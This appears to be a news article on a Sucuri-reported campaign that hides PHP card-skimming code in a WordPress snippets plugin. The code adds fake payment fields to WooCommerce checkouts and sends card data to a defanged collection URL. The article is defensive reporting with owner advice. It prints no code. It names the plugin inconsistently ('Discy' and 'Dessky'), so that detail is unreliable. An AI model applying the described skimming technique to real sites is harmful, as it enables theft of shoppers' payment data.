According to a report from Sucuri, unknown hackers are utilizing little-known WordPress plugins to inject malicious PHP code on websites and steal payment data. On May 11, Sucuri experts identified a campaign in which attackers exploited the plugin Discy Snippets, which has over 200 active installations and allows users to add their own PHP code.
In these attacks, hackers exploit vulnerabilities in WordPress plugins or easily guessed login credentials to gain administrator access. They then install additional plugins to further their operations. The Dessky Snippets plugin is being used to deploy server malware on PHP, which facilitates the skimming of credit card information on compromised sites and the theft of financial data.
The malicious code is stored in the DNSP_Settings parameter in WP_OPTIONS tables and alters the checkout process in WooCommerce. The code manipulates the checkout form by adding fields for entering payment card details such as name, address, card number, expiration date, and CVV number. The gathered data is then sent to the URL “Hxxps://2of[.]CC/WP-Content/”.
Characteristics of the malicious campaign
The campaign includes an attribute for automation (autocomplete=”off”) in the billing form. This lowers the chances of the browser warning users about inputting sensitive information. Additionally, the form fields remain blank until filled manually by the user, reducing suspicion.
Recommendations for WordPress site owners
It is advised that WordPress website owners, particularly those with e-commerce features, keep their sites and plugins up to date. They should use strong passwords to prevent attacks and routinely check their sites for any signs of malware or unauthorized alterations.
Earlier reports indicated that cybercriminals had started exploiting a critical vulnerability in the WP Automatic plugin for WordPress. This vulnerability allows them to create accounts with administrative privileges and establish backdoors for prolonged access.